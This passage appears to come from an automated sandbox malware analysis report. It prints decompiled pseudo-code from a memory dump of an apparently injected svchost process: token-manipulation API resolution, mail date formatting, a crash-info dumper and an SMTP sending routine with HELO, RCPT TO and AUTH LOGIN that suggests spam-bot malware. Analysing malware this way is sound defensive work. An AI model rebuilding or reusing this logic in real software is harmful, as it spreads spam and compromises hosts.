                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                                                  • API String ID: 2238633743-3228201535
                                                                                                                                  • Opcode ID: 2e131e1efce7ea8f378ca2cc9855fd4d222cd7cc1896c71d7392d616d65ab324
                                                                                                                                  • Instruction ID: b5e76182aad7eeae80e5893604cc7d48fb1c0d03db4ded5744b59bee8e33ca50
                                                                                                                                  • Opcode Fuzzy Hash: 2e131e1efce7ea8f378ca2cc9855fd4d222cd7cc1896c71d7392d616d65ab324
                                                                                                                                  • Instruction Fuzzy Hash: 21518F71E82E11B7E7348F69E8407523AA4734B324F0687969A29F21D0D778C09DEF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E0251B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0251ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                                                                  0x0251b225
                                                                                                                                  0x0251b22c
                                                                                                                                  0x0251b233
                                                                                                                                  0x0251b23a
                                                                                                                                  0x0251b241
                                                                                                                                  0x0251b248
                                                                                                                                  0x0251b24f
                                                                                                                                  0x0251b256
                                                                                                                                  0x0251b25d
                                                                                                                                  0x0251b264
                                                                                                                                  0x0251b26b
                                                                                                                                  0x0251b272
                                                                                                                                  0x0251b279
                                                                                                                                  0x0251b280
                                                                                                                                  0x0251b287
                                                                                                                                  0x0251b28e
                                                                                                                                  0x0251b295
                                                                                                                                  0x0251b29c
                                                                                                                                  0x0251b2a3
                                                                                                                                  0x0251b2ad
                                                                                                                                  0x0251b2c2
                                                                                                                                  0x0251b2d0
                                                                                                                                  0x0251b2af
                                                                                                                                  0x0251b2b3
                                                                                                                                  0x0251b2b3
                                                                                                                                  0x0251b2d2
                                                                                                                                  0x0251b2d7
                                                                                                                                  0x0251b2e1
                                                                                                                                  0x0251b2e7
                                                                                                                                  0x0251b2f0
                                                                                                                                  0x0251b306
                                                                                                                                  0x0251b30c
                                                                                                                                  0x0251b30f
                                                                                                                                  0x0251b2f2
                                                                                                                                  0x0251b2f4
                                                                                                                                  0x0251b2fa
                                                                                                                                  0x0251b2fd
                                                                                                                                  0x0251b2fd
                                                                                                                                  0x0251b31a
                                                                                                                                  0x0251b31a
                                                                                                                                  0x0251b323
                                                                                                                                  0x0251b329
                                                                                                                                  0x0251b32f
                                                                                                                                  0x0251b338
                                                                                                                                  0x0251b33a
                                                                                                                                  0x0251b33a
                                                                                                                                  0x0251b33d
                                                                                                                                  0x0251b341
                                                                                                                                  0x0251b344
                                                                                                                                  0x0251b34b
                                                                                                                                  0x0251b34f
                                                                                                                                  0x0251b350
                                                                                                                                  0x0251b350
                                                                                                                                  0x0251b358
                                                                                                                                  0x0251b35d
                                                                                                                                  0x0251b35d
                                                                                                                                  0x0251b366
                                                                                                                                  0x0251b36a
                                                                                                                                  0x0251b36b
                                                                                                                                  0x0251b36b
                                                                                                                                  0x0251b371
                                                                                                                                  0x0251b376
                                                                                                                                  0x0251b378
                                                                                                                                  0x0251b378
                                                                                                                                  0x0251b37f
                                                                                                                                  0x0251b380
                                                                                                                                  0x0251b3c4

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0251B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0251B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0251B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0251B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0251B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0251B329
                                                                                                                                  • wsprintfA.USER32 ref: 0251B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: c7617cb3ec94e82100e0aa159bc9f0dbe75f54589b3c385022dd801d05f1fb81
                                                                                                                                  • Instruction ID: 10f6daf0dba2f966a9184d0bfac5f0a0c2143a5bb109d8a62cca4405803f83f6
                                                                                                                                  • Opcode Fuzzy Hash: c7617cb3ec94e82100e0aa159bc9f0dbe75f54589b3c385022dd801d05f1fb81
                                                                                                                                  • Instruction Fuzzy Hash: A45128B1E0222CAADF14CFD4D9889EEFBF9BB5A308F105459E501B61D0D3344A9CCB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02516511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E02516511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0251E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E02516511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0251EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x2522c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0251E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0251E318();
				return 1;
			}
























                                                                                                                                  0x02516511
                                                                                                                                  0x02516512
                                                                                                                                  0x0251651c
                                                                                                                                  0x02516521
                                                                                                                                  0x02516524
                                                                                                                                  0x02516532
                                                                                                                                  0x0251654d
                                                                                                                                  0x0251654f
                                                                                                                                  0x02516552
                                                                                                                                  0x02516564
                                                                                                                                  0x0251674e
                                                                                                                                  0x02516755
                                                                                                                                  0x02516755
                                                                                                                                  0x0251656d
                                                                                                                                  0x02516578
                                                                                                                                  0x02516587
                                                                                                                                  0x025165a3
                                                                                                                                  0x025165e3
                                                                                                                                  0x025165ee
                                                                                                                                  0x025165f9
                                                                                                                                  0x02516600
                                                                                                                                  0x02516606
                                                                                                                                  0x02516607
                                                                                                                                  0x02516608
                                                                                                                                  0x02516609
                                                                                                                                  0x0251660f
                                                                                                                                  0x0251661b
                                                                                                                                  0x0251661c
                                                                                                                                  0x0251661f
                                                                                                                                  0x02516620
                                                                                                                                  0x02516623
                                                                                                                                  0x02516626
                                                                                                                                  0x0251662c
                                                                                                                                  0x0251662f
                                                                                                                                  0x02516632
                                                                                                                                  0x02516639
                                                                                                                                  0x0251663a
                                                                                                                                  0x0251663d
                                                                                                                                  0x02516640
                                                                                                                                  0x0251668a
                                                                                                                                  0x0251668a
                                                                                                                                  0x02516696
                                                                                                                                  0x0251669e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516643
                                                                                                                                  0x02516648
                                                                                                                                  0x02516650
                                                                                                                                  0x02516671
                                                                                                                                  0x02516673
                                                                                                                                  0x02516676
                                                                                                                                  0x02516678
                                                                                                                                  0x02516678
                                                                                                                                  0x0251667a
                                                                                                                                  0x0251667d
                                                                                                                                  0x0251667e
                                                                                                                                  0x0251667f
                                                                                                                                  0x02516680
                                                                                                                                  0x02516681
                                                                                                                                  0x02516688
                                                                                                                                  0x02516689
                                                                                                                                  0x00000000
                                                                                                                                  0x02516689
                                                                                                                                  0x00000000
                                                                                                                                  0x02516648
                                                                                                                                  0x025166a0
                                                                                                                                  0x025166b3
                                                                                                                                  0x025166b5
                                                                                                                                  0x025166ba
                                                                                                                                  0x025166bd
                                                                                                                                  0x025166c7
                                                                                                                                  0x025166cc
                                                                                                                                  0x025166d1
                                                                                                                                  0x025166d7
                                                                                                                                  0x025166d7
                                                                                                                                  0x025166d8
                                                                                                                                  0x025166eb
                                                                                                                                  0x025166eb
                                                                                                                                  0x025166ff
                                                                                                                                  0x02516701
                                                                                                                                  0x02516704
                                                                                                                                  0x02516706
                                                                                                                                  0x02516706
                                                                                                                                  0x02516709
                                                                                                                                  0x0251670c
                                                                                                                                  0x0251671f
                                                                                                                                  0x02516734
                                                                                                                                  0x0251673c
                                                                                                                                  0x0251674b

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: adfb0f5b4da0657c9cc30d413fb9b705861b3a1cb74b9a5f968b56dff532b552
                                                                                                                                  • Instruction ID: 11c253022b06d596639a0c084fb35aa4c9fce8d2e89d002cf9bee6d3287087a7
                                                                                                                                  • Opcode Fuzzy Hash: adfb0f5b4da0657c9cc30d413fb9b705861b3a1cb74b9a5f968b56dff532b552
                                                                                                                                  • Instruction Fuzzy Hash: 86619E72A40218AFEB609FB4DC45FEA77E9FF09300F104469F959D21A1DB70A948CF58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251A7C1 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299networkstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E0251A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0251EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0251EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0251EF00(_a16, "Too small respons\n");
							} else {
								E0251EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0251EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0251EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0251EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x2523668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x2523630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x2523634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x2523638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0251A699( &_v1156,  *0x2523634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0251A699( &_v1156,  *0x2523638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0251E819(1, "localcfg", "ip", E025130B5());
														_push( &_v132);
														_t85 = E0251EE95( &_v1156, E0251A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0251A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0251AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x2523668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0251EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


































                                                                                                                                  0x0251a7cb
                                                                                                                                  0x0251a7cf
                                                                                                                                  0x0251a7cf
                                                                                                                                  0x0251a7d3
                                                                                                                                  0x0251a7d9
                                                                                                                                  0x0251a87d
                                                                                                                                  0x0251a87e
                                                                                                                                  0x0251a886
                                                                                                                                  0x0251a88d
                                                                                                                                  0x0251a893
                                                                                                                                  0x0251a897
                                                                                                                                  0x0251a8bf
                                                                                                                                  0x0251a8c2
                                                                                                                                  0x0251a8f2
                                                                                                                                  0x0251a8f2
                                                                                                                                  0x0251a8f8
                                                                                                                                  0x0251a8fa
                                                                                                                                  0x0251a900
                                                                                                                                  0x0251a906
                                                                                                                                  0x0251a909
                                                                                                                                  0x0251a90a
                                                                                                                                  0x0251a978
                                                                                                                                  0x0251a97c
                                                                                                                                  0x0251a97e
                                                                                                                                  0x0251a980
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a912
                                                                                                                                  0x0251a914
                                                                                                                                  0x0251a91a
                                                                                                                                  0x0251a9b9
                                                                                                                                  0x0251a9c2
                                                                                                                                  0x0251ab4a
                                                                                                                                  0x0251ab4a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ab4a
                                                                                                                                  0x0251a920
                                                                                                                                  0x0251a924
                                                                                                                                  0x0251a92c
                                                                                                                                  0x0251a954
                                                                                                                                  0x0251a95f
                                                                                                                                  0x0251a966
                                                                                                                                  0x0251a968
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a96a
                                                                                                                                  0x0251a96c
                                                                                                                                  0x0251a96c
                                                                                                                                  0x0251a96e
                                                                                                                                  0x0251a970
                                                                                                                                  0x0251a971
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a971
                                                                                                                                  0x0251a92e
                                                                                                                                  0x0251a931
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a940
                                                                                                                                  0x0251a945
                                                                                                                                  0x0251a948
                                                                                                                                  0x0251a94c
                                                                                                                                  0x0251a952
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a952
                                                                                                                                  0x0251a982
                                                                                                                                  0x0251a985
                                                                                                                                  0x0251a988
                                                                                                                                  0x0251a89e
                                                                                                                                  0x0251a89e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a89e
                                                                                                                                  0x0251a98e
                                                                                                                                  0x0251a991
                                                                                                                                  0x0251a9d1
                                                                                                                                  0x0251a993
                                                                                                                                  0x0251a99f
                                                                                                                                  0x0251a9a7
                                                                                                                                  0x0251a9aa
                                                                                                                                  0x0251a9aa
                                                                                                                                  0x0251a9d8
                                                                                                                                  0x0251a9db
                                                                                                                                  0x0251ab39
                                                                                                                                  0x0251ab41
                                                                                                                                  0x0251ab48
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a9e1
                                                                                                                                  0x0251a9e1
                                                                                                                                  0x0251a9e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a9fb
                                                                                                                                  0x0251a9fe
                                                                                                                                  0x0251aa04
                                                                                                                                  0x0251aa32
                                                                                                                                  0x0251aa40
                                                                                                                                  0x0251aa41
                                                                                                                                  0x0251aa46
                                                                                                                                  0x0251aa49
                                                                                                                                  0x0251aa49
                                                                                                                                  0x0251aa4d
                                                                                                                                  0x0251aa52
                                                                                                                                  0x0251aa54
                                                                                                                                  0x0251aa54
                                                                                                                                  0x0251aa57
                                                                                                                                  0x0251aa68
                                                                                                                                  0x0251aa68
                                                                                                                                  0x0251aa6a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa70
                                                                                                                                  0x0251aa75
                                                                                                                                  0x0251aa77
                                                                                                                                  0x0251ab35
                                                                                                                                  0x0251ab35
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ab35
                                                                                                                                  0x0251aa7d
                                                                                                                                  0x0251aa83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa89
                                                                                                                                  0x0251aa8f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251aa95
                                                                                                                                  0x0251aa98
                                                                                                                                  0x0251aab4
                                                                                                                                  0x0251aac1
                                                                                                                                  0x0251aac8
                                                                                                                                  0x0251aaca
